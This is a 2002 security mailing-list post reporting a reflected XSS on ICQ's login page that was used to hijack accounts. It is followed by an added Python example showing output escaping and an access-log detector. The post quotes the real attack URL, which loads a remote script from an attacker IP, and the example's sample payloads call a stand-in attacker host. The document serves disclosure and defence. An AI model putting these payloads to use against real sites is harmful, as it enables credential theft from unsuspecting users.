Security Incidents mailing list archives
[Fwd: XSS on ICQ leading to password compromise]
From: Rafael Coninck Teigao <rafael () SafeCore NET>
Date: Mon, 02 Dec 2002 14:29:37 -0200
Moderator: I've sent the following email to bugtraq last week. Haven't seen it on the list, but it came to my attention that even more accounts were hijacked this way. I'm also sending this to incidents, because I think that maybe some administrators are receiving similar complaints from their users and could (perhaps) block the XSS pages somehow.

-------- Original Message --------
From: Rafael Coninck Teigao <rafael () SafeCore NET>
Subject: XSS on ICQ leading to password compromise
To: SecurityFocus - Bugtraq <bugtraq () securityfocus com>
CC: horvath () avalon sul com br, ahi () TELEFONICAEMPRESAS NET BR, nbso () nic br

Hello, pp.

I've tried to find some representative from the ICQ technical staff but had no success so far. Anyway, here's what's happening:

A friend of mine got the following address on his ICQ from a friend on his contact list:

http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=<script%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E</script%3e

We can clearly see the <script... part on it. Unfortunately, he couldn't. When the page opened, he typed his email address and password. Five minutes later he was disconnected from ICQ and was unable to log in again. He then tried to recover his password and saw that it was set to:

aaaaa
a

That's right, it has a new line in it.

The source of the script is:

http://200.158.50.245/web/icq.asa

That IP address comes from an ADSL from Telesp. The date and time of the incident were Nov/24 at 20:12 (GMT -2). He also told me that the friend who sent him the address and another person had their accounts hijacked as well.
Best regards,

Rafael Coninck Teigao
SafeCore Network Solutions
http://SafeCore.NET
+55 41 224 1785

--
------------------------------------------------------------------------
"The only people for me are the mad ones -- the ones who are mad to live, mad to talk, mad to be saved, desirous of everything at the same time, the ones who never yawn or say a commonplace thing, but burn, burn, burn like fabulous yellow Roman candles."
-- Jack Kerouac, "On the Road"
------------------------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
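The mail above describes a reflected XSS: the login page echoes the karma_err_msg query parameter into its markup without escaping, so a link carrying a script tag in that parameter turns the real login page into a credential harvester. The following is an added example (not from the original mail, and not ICQ's code) showing the two things the post asks for from the defender's side: the output-escaping fix that would have neutralised the parameter, and a log check an administrator could run to spot such links hitting their own site. The page template, the hostnames (attacker.invalid) and the log lines are constructed for the example; only the parameter name and URL shape come from the post.

```python
"""Added example: defending against a reflected XSS in an echoed query parameter.

1. render_error_page_vulnerable / render_error_page_fixed contrast echoing the
   parameter raw (the behaviour the post describes) with HTML-escaping it.
2. find_script_injection scans web-server access log lines for a <script tag
   hidden in any query parameter, undoing repeated percent-encoding first.

Everything below (template, hosts, log lines) is constructed for illustration.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Minimal stand-in for a login page that shows a server-supplied error message.
TEMPLATE = '<html><body><p class="err">{msg}</p><form>...</form></body></html>'


def render_error_page_vulnerable(karma_err_msg: str) -> str:
    """Echo the parameter straight into the HTML (the flaw described in the mail)."""
    return TEMPLATE.format(msg=karma_err_msg)


def render_error_page_fixed(karma_err_msg: str) -> str:
    """HTML-escape on output so <, >, & and quotes can never open a tag/attribute."""
    return TEMPLATE.format(msg=html.escape(karma_err_msg, quote=True))


# Matches the start of a script element regardless of case or inner whitespace.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

# Apache-style request field: "GET /path?query HTTP/1.x"
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding; stop when a round changes nothing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_script_injection(log_lines):
    """Return (line_no, parameter, decoded_value) for every query parameter whose
    fully decoded value contains a <script tag."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs already decodes one layer; decode_fully handles double-encoding.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                decoded = decode_fully(raw)
                if SCRIPT_TAG.search(decoded):
                    hits.append((line_no, param, decoded))
    return hits


# Constructed access-log lines: one single-encoded injection, one benign message,
# one double-encoded injection.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Nov/2002:20:12:01 -0200] "GET /login/login_page/1,,err_sys_busy,00.html'
    '?karma_err_msg=%3Cscript%20src=%22http://attacker.invalid/icq.asa%22%3E%3C/script%3E HTTP/1.0" 200 4211',
    '10.0.0.6 - - [24/Nov/2002:20:13:44 -0200] "GET /login/login_page/1,,err_sys_busy,00.html'
    '?karma_err_msg=Sorry%2C%20the%20system%20is%20busy HTTP/1.0" 200 4100',
    '10.0.0.7 - - [24/Nov/2002:20:15:09 -0200] "GET /login/login_page/1,,err_sys_busy,00.html'
    '?karma_err_msg=%253Cscript%2520src%3D%22http://attacker.invalid/x.js%22%253E HTTP/1.0" 200 4211',
]


if __name__ == "__main__":
    payload = '<script src="http://attacker.invalid/x.js"></script>'
    print("vulnerable:", render_error_page_vulnerable(payload))
    print("fixed:     ", render_error_page_fixed(payload))
    for line_no, param, value in find_script_injection(SAMPLE_LOG):
        print(f"line {line_no}: parameter {param!r} carries {value!r}")
```

The escaping fix is the one that matters: the log check only tells you that links of this shape are already circulating, and it will miss encodings or tag variants the regex does not cover, so it is a detection aid rather than a substitute for escaping every reflected value on output.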